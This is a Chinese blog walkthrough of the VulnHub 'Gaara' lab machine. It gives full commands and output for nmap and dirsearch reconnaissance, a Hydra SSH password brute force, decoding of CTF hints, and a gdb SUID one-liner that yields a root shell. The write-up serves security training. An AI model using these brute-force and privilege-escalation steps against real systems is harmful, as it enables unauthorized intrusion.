太久没有认真写~~（水）~~文章了，正好最近有实训课，同事发来几台靶机，写写记录。
靶机地址：https://www.vulnhub.com/entry/gaara-1,629/

信息收集

注：直接使用 VMware 导入 ova 即可。

首先查看 Kali IP 地址：

root at kali in ~/Gaara 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1654sec preferred_lft 1654sec
    inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

地址探测

使用 Nmap 扫描出一个 IP：10.10.8.23

root at kali in ~/Gaara 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:51 CST
Nmap scan report for 10.10.8.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000099s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.23
Host is up (0.000063s latency).
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000047s latency).
MAC Address: 00:50:56:E5:23:AF (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.32 seconds

端口扫描

扫描开放端口：

root at kali in ~/Gaara 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.23 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:51 CST
Nmap scan report for 10.10.8.23
Host is up (0.000033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
|   256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_  256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open  http
|_http-title: Gaara
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

服务识别

扫描端口对应服务：

root at kali in ~/Gaara 
$ nmap -p22,80 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.23 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:52 CST
Nmap scan report for 10.10.8.23
Host is up (0.00043s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
|   256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_  256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 10.10.8.23

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds

漏洞扫描

使用 Nmap 进行漏洞扫描：

root at kali in ~/Gaara 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.23 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:52 CST
Nmap scan report for 10.10.8.23
Host is up (0.000032s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.67 seconds

看了下扫出来的漏洞，没一个有用的。

目录扫描

root at kali in ~/Gaara 
$ dirsearch -u http://10.10.8.23 -o $PWD/dirsearch.txt 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/Gaara/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-24-06-20_10-52-57.log

Target: http://10.10.8.23/

[10:52:57] Starting: 
[10:52:58] 403 -  275B  - /.ht_wsr.txt                                     
[10:52:58] 403 -  275B  - /.htaccess.bak1 
......

root at kali in ~/Gaara 
$ cat dirsearch.txt | grep 200
200   288B   http://10.10.8.23:80/index.html

漏洞利用

依次访问扫描出的内容，很明显这是一个自建的站点：

80 端口就一张图片，但是加载不出来。

目录扫描 v2

由于收集信息过少，尝试更换字典：

注：说实话，这个目录正常字典都没有。

root at kali in ~/Gaara 
$ dirsearch -u http://10.10.8.23 -o $PWD/dirsearch.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

  _|. _ _  _  _  _ _|_    v0.4.2         
 (_||| _) (/_(_|| (_| )                                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220545

Output File: /root/Gaara/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-24-06-20_10-58-09.log

Target: http://10.10.8.23/

[10:58:09] Starting: 
[11:00:05] 403 -  275B  - /server-status                                    
[11:03:52] 200 -  327B  - /Cryoserver                                        
                                                                              
Task Completed

发现一个 Cryoserver 目录，访问一下：

信息泄露

可以看到 iamGaara 和前面俩有些不同，仔细观察可以看到一串异常的字符串：f1MgN9mTf9SNbzRygcU

有点 CTF 的感觉了，用 CyberChef 解一下：

SSH 爆破

这里得到一个用户名 gaara，结合前面端口扫描出现的 22 端口，可以尝试进行 SSH 密码爆破：

root at kali in ~/Gaara 
$ hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://10.10.8.23
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-20 11:22:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.8.23:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[22][ssh] host: 10.10.8.23   login: gaara   password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-20 11:24:23

使用 Hydra 爆破出密码为：iloveyou2。
既然有了账号密码，使用 SSH 连接：

root at kali in ~/Gaara 
$ ssh gaara@10.10.8.23
The authenticity of host '10.10.8.23 (10.10.8.23)' can't be established.
ED25519 key fingerprint is SHA256:XpX1VX2RtX8OaktJHdq89ZkpLlYvr88cebZ0tPZMI0I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.8.23' (ED25519) to the list of known hosts.
gaara@10.10.8.23's password: 
Linux Gaara 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb  3 00:14:55 2022 from 192.168.220.1
gaara@Gaara:~$ id
uid=1001(gaara) gid=1001(gaara) groups=1001(gaara)

找找可以利用的信息，在当前目录下发现一个 flag：

gaara@Gaara:~$ ls -al
total 36
drwxr-xr-x 3 gaara gaara 4096 Dec 13  2020 .
drwxr-xr-x 3 root  root  4096 Dec 13  2020 ..
lrwxrwxrwx 1 root  root     9 Dec 13  2020 .bash_history -> /dev/null
-rw-r--r-- 1 gaara gaara  220 Dec 13  2020 .bash_logout
-rw-r--r-- 1 gaara gaara 3526 Dec 13  2020 .bashrc
-rw-r--r-- 1 gaara gaara   33 Dec 13  2020 flag.txt
-rw-r--r-- 1 gaara gaara   57 Dec 13  2020 Kazekage.txt
drwxr-xr-x 3 gaara gaara 4096 Dec 13  2020 .local
-rw-r--r-- 1 gaara gaara  807 Dec 13  2020 .profile
-rw------- 1 gaara gaara  102 Dec 13  2020 .Xauthority
gaara@Gaara:~$ cat flag.txt
5451d3eb27acb16c652277d30945ab1e

除了 flag 外还有个文件，看看内容：

gaara@Gaara:~$ cat Kazekage.txt 
You can find Kazekage here....

L3Vzci9sb2NhbC9nYW1lcw==

看着像 Base64，解密一下：

1 2	gaara@Gaara:~$ echo 'L3Vzci9sb2NhbC9nYW1lcw==' \| base64 -d /usr/local/games

这里提示 /usr/local/games 目录，进入查看：

gaara@Gaara:~$ cd /usr/local/games
gaara@Gaara:/usr/local/games$ ls -al
total 12
-rw-r--r--  1 gaara gaara    0 Feb  3  2022 +
-rw-r--r--  1 gaara gaara    0 Feb  3  2022 +++
-rw-r--r--  1 gaara gaara    0 Feb  3  2022 ++++
-rw-r--r--  1 gaara gaara    0 Feb  3  2022 +++++
-rw-r--r--  1 gaara gaara    0 Feb  3  2022 --
-rw-r--r--  1 gaara gaara    0 Feb  3  2022 ---
-rw-r--r--  1 gaara gaara    0 Feb  3  2022 ----
drwx------  2 gaara gaara 4096 Feb  3  2022 .
drwxr-xr-x 10 root  root  4096 Dec 13  2020 ..
-rw-r--r--  1 gaara gaara 1505 Dec 13  2020 .supersecret.txt

发现一个 .supersecret.txt 文件，查看查看：

gaara@Gaara:/usr/local/games$ cat .supersecret.txt 

Godaime Kazekage:

+++++ +++[- >++++ ++++< ]>+++ +.<++ ++++[ ->+++ +++<] >+.-- ---.< +++++
+++[- >---- ----< ]>--- -.<++ +++++ ++[-> +++++ ++++< ]>+++ +++++ .<+++
[->-- -<]>- .++++ ++.<+ +++++ +++[- >---- ----- <]>-- --.<+ +++++ +++[-
>++++ +++++ <]>+. <+++[ ->--- <]>-- --.-- --.<+ ++[-> +++<] >++.. <+++[
->+++ <]>++ ++.<+ +++++ +++[- >---- ----- <]>-- ----- -.<++ +++++ ++[->
+++++ ++++< ]>+++ .<+++ [->-- -<]>- --.+. +++++ .---. <++++ ++++[ ->---
----- <]>-- ----- ----. <++++ +++++ [->++ +++++ ++<]> +++++ +++.< +++[-
>---< ]>-.+ +++++ .<+++ +++++ +[->- ----- ---<] >---- .<+++ +++++ [->++
+++++ +<]>+ ++.<+ ++[-> +++<] >+++. +++++ +.--- ----- -.--- ----- .<+++
+++++ [->-- ----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++
+++.< +++[- >---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ ++[->
+++++ ++++< ]>++. ----. --.-- ----- -.<++ +[->+ ++<]> +++++ +.<++ +[->-
--<]> ---.+ .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- ----- .<+++
+++++ +[->+ +++++ +++<] >+++. <+++[ ->--- <]>-- -.--- ----. <++++ [->++
++<]> +++.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ ++[-> +++++ +++<]
>++++ +.--- -.<++ ++[-> ++++< ]>++. <+++[ ->--- <]>-. +++.< +++[- >+++<
]>+++ +.<++ +++++ [->-- ----- <]>-- ----- --.<+ ++++[ ->--- --<]> -----
-.<++ +++++ [->++ +++++ <]>++ +.<++ +++[- >++++ +<]>+ ++++. +++++ ++.<+
+++++ +++[- >---- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >++++ .<+++
++[-> +++++ <]>.< ++++[ ->+++ +<]>+ .<+++ [->-- -<]>- ----. +.<++ +[->+
++<]> ++++. <++++ +++++ [->-- ----- --<]> .<

一眼 brainfuck，解密看看：

绕了一圈，被骗了…

SUID 提权

查看当前系统中可使用的用户：

1
2
3

gaara@Gaara:/usr/local/games$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
gaara:x:1001:1001:,,,:/home/gaara:/bin/bash

查看是否存在 SUDO 提权：

gaara@Gaara:/usr/local/games$ sudo -l
sudo: unable to resolve host Gaara: Name or service not known
[sudo] password for gaara: 
Sorry, user gaara may not run sudo on Gaara.

查看是否存在 SUID 文件：

gaara@Gaara:/usr/local/games$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/gdb
/usr/bin/sudo
/usr/bin/gimp-2.10
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/umount

发现一个 gdb 命令，Linux GDB（GNU Debugger）是一个强大的命令行调试工具，用于调试 C 和 C++ 程序。
在 GTFOBins 中看看有没有 SUID 提权的可能：

有！那就直接执行：

gaara@Gaara:/usr/local/games$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara)

成功提权，查找 flag：

# cd /root
# ls -al
total 24
drwx------  3 root root 4096 Dec 13  2020 .
drwxr-xr-x 18 root root 4096 Dec 13  2020 ..
lrwxrwxrwx  1 root root    9 Dec 13  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Dec 13  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  803 Dec 13  2020 root.txt
# cat root.txt  


 ██████╗  █████╗  █████╗ ██████╗  █████╗ 
██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██╔══██╗
██║  ███╗███████║███████║██████╔╝███████║
██║   ██║██╔══██║██╔══██║██╔══██╗██╔══██║
╚██████╔╝██║  ██║██║  ██║██║  ██║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝

8a763d61f71db8e7aa237055de928d86

Congrats You have Rooted Gaara.

Give the feedback on Twitter if you Root this : @0xJin